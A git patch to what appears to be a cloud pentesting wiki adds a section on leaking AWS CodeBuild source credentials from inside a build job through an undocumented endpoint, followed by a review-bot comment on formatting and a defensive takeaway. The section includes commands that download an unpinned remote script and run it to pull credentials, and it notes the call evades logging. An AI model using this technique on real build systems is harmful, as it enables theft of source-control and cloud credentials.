From a0ce4e47be8ffa8389045a77a680d315b45ec24a Mon Sep 17 00:00:00 2001 From: Thomas Preece Date: Wed, 1 Apr 2026 08:01:37 +0100 Subject: [PATCH] Add new CodeBuild Credential leakage technique --- .../aws-codebuild-token-leakage.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md index 9641fa7f5..f847dadf5 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md 
@@ -10,6 +10,18 @@ First, check if there are any source credentials configured that you could leak: aws codebuild list-source-credentials ``` +### Via RCE in CodeBuild Job + +From within a CodeBuild job, you can hit an undocumented AWS CodeBuild API endpoint which will return you the credentials used by CodeBuild. This can be used to obtain the credentials the CodeBuild job was setup with e.g. AWS CodeConnection credentials, OAUTH or PAT credentials. The CodeBuild job does not need to be privileged to hit this endpoint and it is also hard to detect in logging and monitoring as CodeBuild itself calls this endpoint several times on startup. + +The technique is explained further in [https://thomaspreece.com/2026/03/23/part-2-aws-codebuild-escalating-privileges-via-aws-codeconnections/](https://thomaspreece.com/2026/03/23/part-2-aws-codebuild-escalating-privileges-via-aws-codeconnections/) but in summary to obtain credentials within the CodeBuild job you just need to run the following: + +``` +python -m pip install botocore boto3 requests +wget https://raw.githubusercontent.com/thomaspreece/AWS-CodeFactoryTokenService-API/refs/heads/main/GetBuildInfo.py +python ./GetBuildInfo.py +``` + ### Via Docker Image If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project.
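Review bot: the new three-command fence has no language tag; the existing block in this file (`aws codebuild list-source-credentials`) is fenced the same way, so tagging the new one as ```bash keeps rendering consistent. The snippet also downloads `GetBuildInfo.py` from `refs/heads/main` and executes it as-is, so what the section documents is tied to whatever that branch contains on the day a reader follows it; pinning the raw URL to a specific commit would make the steps reproducible and lets a reader review the script before it runs inside a build. In the prose, "setup with" should read "set up with" and "OAUTH" should be "OAuth". Finally, the paragraph notes the endpoint is hard to spot in logging because CodeBuild itself calls it several times on startup; since the page is in a post-exploitation section, a one-line defensive takeaway would round it out, namely that any source credential or CodeConnection attached to a project is readable by whoever gets code execution in the job, so those credentials should be scoped to the minimum the build needs.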